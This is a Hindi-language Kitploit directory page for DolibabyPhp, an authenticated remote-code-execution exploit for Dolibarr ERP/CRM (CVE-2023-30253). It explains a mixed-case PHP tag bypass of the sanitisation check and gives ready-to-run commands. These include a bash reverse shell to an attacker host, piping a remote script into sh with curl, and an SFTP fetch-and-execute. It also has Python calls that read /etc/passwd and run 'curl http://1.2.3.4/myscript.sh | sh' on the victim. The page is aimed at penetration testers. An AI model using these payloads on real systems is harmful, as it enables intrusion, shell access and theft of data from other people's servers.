Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
DolibabyPhp — Dolibarr ERP/CRM CVE-2023-30253 के लिए एक प्रमाणित RCE एक्सप्लॉइट। | Kitploit
उपकरण/GitHubGitHub/andria-dev/dolibabyphp
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubandria-dev/dolibabyphp

DolibabyPhp

Dolibarr ERP/CRM CVE-2023-30253 के लिए एक प्रमाणित RCE एक्सप्लॉइट।

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

DolibabyPhp

Dolibarr ERP/CRM CVE-2023-30253 के लिए एक प्रमाणित RCE शोषण।

स्थापना

आप PyPi रिपॉजिटरी से pip के साथ पैकेज स्थापित कर सकते हैं या GitHub से सीधे स्रोत को git clone कर सकते हैं।

root@kitploit:~
pip install dolibabyphp

उपयोग

root@kitploit:~
Usage: dolibabyphp [OPTIONS] TARGET_URL USERNAME PASSWORD COMMAND [ARGS]...

  This exploit will log into the Dolibarr web server at the specified target URL
  with the provided username and password. After that it will attempt to create
  a web page with a unique name. Once created, it will modify the web page to
  include the custom PHP code bypassing the sanitation check by not using only
  lowercase letters (e.g. PHP or pHp instead of php). There are multiple
  payloads to choose from After the payload has finished running, the web page
  will be deleted.

Options:
  --site-name TEXT       Specify a name to use when creating a site on the
                         target. Defaults to UUIDv4.
  --page-name TEXT       Specify a name to use when creating a page on the
                         target. Defaults to UUIDv4.
  --page-title TEXT      Specify a title for the page. Defaults to the page
                         name.
  --proxy TEXT           Specify a proxy URL for use in all requests.
  -o, --output FILENAME  Specify a file path to output the results of the
                         payload to. Defaults to stdout.
  -h, --help             Show this message and exit.

Commands:
  bash-reverse-shell     Spawns a bash shell on the victim machine and...
  cleanup                Runs the cleanup script on the target for given site...
  curl-pipe              Curl a file and pipe it to another command.
  custom-php-payload     Specify your own PHP payload to be run on the victim...
  custom-system-payload  Specify your own payload to be run via PHP system()...
  sftp                   SFTPs to the attacker machine, downloads the...
  wget                   Downloads the file at the specified URL to to the...

उदाहरण

CLI का उपयोग करने के कुछ उदाहरण यहां दिए गए हैं।

root@kitploit:~
# Bash के साथ रिवर्स शेल।
dolibabyphp http://example.com/ username1 pass_word23 bash-reverse-shell --lhost 1.2.3.4 --lport 4444

# प्रॉक्सी के साथ कस्टम पेलोड।
dolibabyphp --proxy http://127.0.0.1:8080 http://example.com/ username1 pass_word23 custom-system-payload --payload "uname -a"

# SFTP और निष्पादित पेलोड जिसका आउटपुट फ़ाइल में लिखा जाता है।
dolibabyphp -o ./linpeas-output.txt http://example.com/ username1 pass_word23 sftp --private-key-file ./id_ed25519 sftp://[email protected]:2222/linpeas.sh ./style.css

# Curl पेलोड और इसे sh पर पाइप करें।
dolibabyphp -o ./linpeas-output.txt http://example.com/ username1 pass_word23 curl-pipe https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

Python से

यदि आप इस शोषण को किसी अन्य Python प्रोजेक्ट में एकीकृत करना चाहते हैं, तो आप इसे आयात कर सकते हैं।

root@kitploit:~
from dolibabyphp import Exploit, furl, php_system, open_file, cleanup_site
from time import sleep

exploit = Exploit(
  target_url=furl('http://example.com'),
  username="username1",
  password="pass_word23",
)

# You can get the result of the payload directly from the exploit.
result = exploit.run(php_system('cat /etc/passwd'))
users = list(map(lambda acct: acct.split(':')[0], result.output.split('\n')))

# If cleanup fails, we can just try again.
while not result.cleaned_up:
  time.sleep(30) # wait a bit before trying cleanup again
  result.cleanup()

# You can also have it write the result to a file.
with open_file('./exploit-output.txt', 'w', lazy=True) as file:
  # You can reuse the same Exploit instance.
  exploit.output = file
  # The site_name and page_name do not change automatically.
  result = exploit.run(php_system('curl http://1.2.3.4/myscript.sh | sh'))

स्रोत से चलाना

स्रोत कोड से प्रोजेक्ट चलाने के लिए, आप या तो rye run का उपयोग कर सकते हैं या सुनिश्चित करें कि आपने PYTHONPATH में src/ निर्देशिका जोड़ दी है और फिर -m फ्लैग के साथ मॉड्यूल dolibabyphp आयात करें।

root@kitploit:~
# rye के साथ
rye run dolibabyphp

# rye के बिना
PYTHONPATH="$(pwd)/src/" python -m dolibabyphp
टूल डाउनलोड करें